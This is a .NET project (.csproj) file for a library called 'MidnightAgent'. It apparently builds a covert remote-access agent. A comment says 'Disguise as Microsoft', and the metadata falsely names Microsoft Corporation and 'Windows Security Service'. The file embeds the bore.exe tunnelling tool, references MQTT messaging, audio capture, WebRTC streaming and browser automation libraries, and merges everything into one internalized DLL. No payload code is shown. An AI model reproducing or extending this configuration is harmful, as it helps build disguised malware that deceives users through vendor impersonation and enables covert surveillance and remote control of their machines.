<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Library</OutputType>
    <TargetFramework>net48</TargetFramework>
    <RootNamespace>MidnightAgent</RootNamespace>
    <AssemblyName>MidnightAgent</AssemblyName>
    <LangVersion>latest</LangVersion>
    
    <!-- Optimization -->
    <Optimize>true</Optimize>
    <DebugType>none</DebugType>
    <DebugSymbols>false</DebugSymbols>
    <PlatformTarget>x64</PlatformTarget>
    
    <!-- Disguise as Microsoft -->
    <Company>Microsoft Corporation</Company>
    <Product>Windows Security</Product>
    <Description>Windows Security Service</Description>
    <Copyright>Copyright © Microsoft Corporation 2024</Copyright>
    <Version>0.6.68.0</Version>
    <FileVersion>0.6.68.0</FileVersion>
    <AssemblyVersion>0.6.68.0</AssemblyVersion>
    <Deterministic>true</Deterministic>
    <EnableDefaultEmbeddedResourceItems>false</EnableDefaultEmbeddedResourceItems>
    <AllowUnsafeBlocks>true</AllowUnsafeBlocks>
  </PropertyGroup>

  <ItemGroup>
    <Reference Include="System.Windows.Forms" />
    <Reference Include="System.Drawing" />
    <Reference Include="System.Management" />
    <Reference Include="System.IO.Compression" />
    <Reference Include="System.IO.Compression.FileSystem" />
    <Reference Include="System.Security" />
    <Reference Include="System.Net.Http" />
    <Reference Include="System.Net.Http.WebRequest" />
  </ItemGroup>

  <ItemGroup>
    <PackageReference Include="Microsoft.NETFramework.ReferenceAssemblies" Version="1.0.3" PrivateAssets="All" />
    <PackageReference Include="MQTTnet" Version="4.3.1.873" />
    <PackageReference Include="Newtonsoft.Json" Version="13.0.3" />
    <PackageReference Include="ILRepack.Lib.MSBuild.Task" Version="2.0.34.2" />
    <PackageReference Include="Costura.Fody" Version="5.7.0">
      <PrivateAssets>all</PrivateAssets>
      <IncludeAssets>runtime; build; native; contentfiles; analyzers; buildtransitive</IncludeAssets>
    </PackageReference>
    <PackageReference Include="NAudio" Version="2.2.1" />
    <PackageReference Include="Concentus" Version="2.2.2" />
    <PackageReference Include="SIPSorcery" Version="10.0.3" />
    <PackageReference Include="SIPSorceryMedia.Abstractions" Version="8.0.12" />
    <PackageReference Include="Selenium.WebDriver" Version="4.44.0" />
  </ItemGroup>

  <ItemGroup>
    <EmbeddedResource Include="Resources\bore.exe">
      <LogicalName>bore.exe</LogicalName>
    </EmbeddedResource>
    <EmbeddedResource Include="Resources\selenium-manager.exe">
      <LogicalName>selenium-manager.exe</LogicalName>
    </EmbeddedResource>
  </ItemGroup>

  <!-- ILRepack Configuration -->
  <Target Name="AfterBuild" Condition="'$(Configuration)' == 'Release'">
    <ItemGroup>
      <InputAssemblies Include="$(OutputPath)\$(AssemblyName).dll" />
      <Dependencies Include="$(OutputPath)\*.dll" Exclude="$(OutputPath)\$(AssemblyName).dll" />
      <InputAssemblies Include="@(Dependencies)" />
    </ItemGroup>
    
    <ILRepack Parallel="true" Internalize="true" InputAssemblies="@(InputAssemblies)" TargetKind="Dll" OutputFile="$(OutputPath)\$(AssemblyName).merged.dll" LibraryPath="$(OutputPath)" />
    
    <!-- Replace original with merged and cleanup -->
    <Copy SourceFiles="$(OutputPath)\$(AssemblyName).merged.dll" DestinationFiles="$(OutputPath)\$(AssemblyName).dll" />
    <Delete Files="$(OutputPath)\$(AssemblyName).merged.dll" />
    <Delete Files="@(Dependencies)" />
  </Target>

</Project>
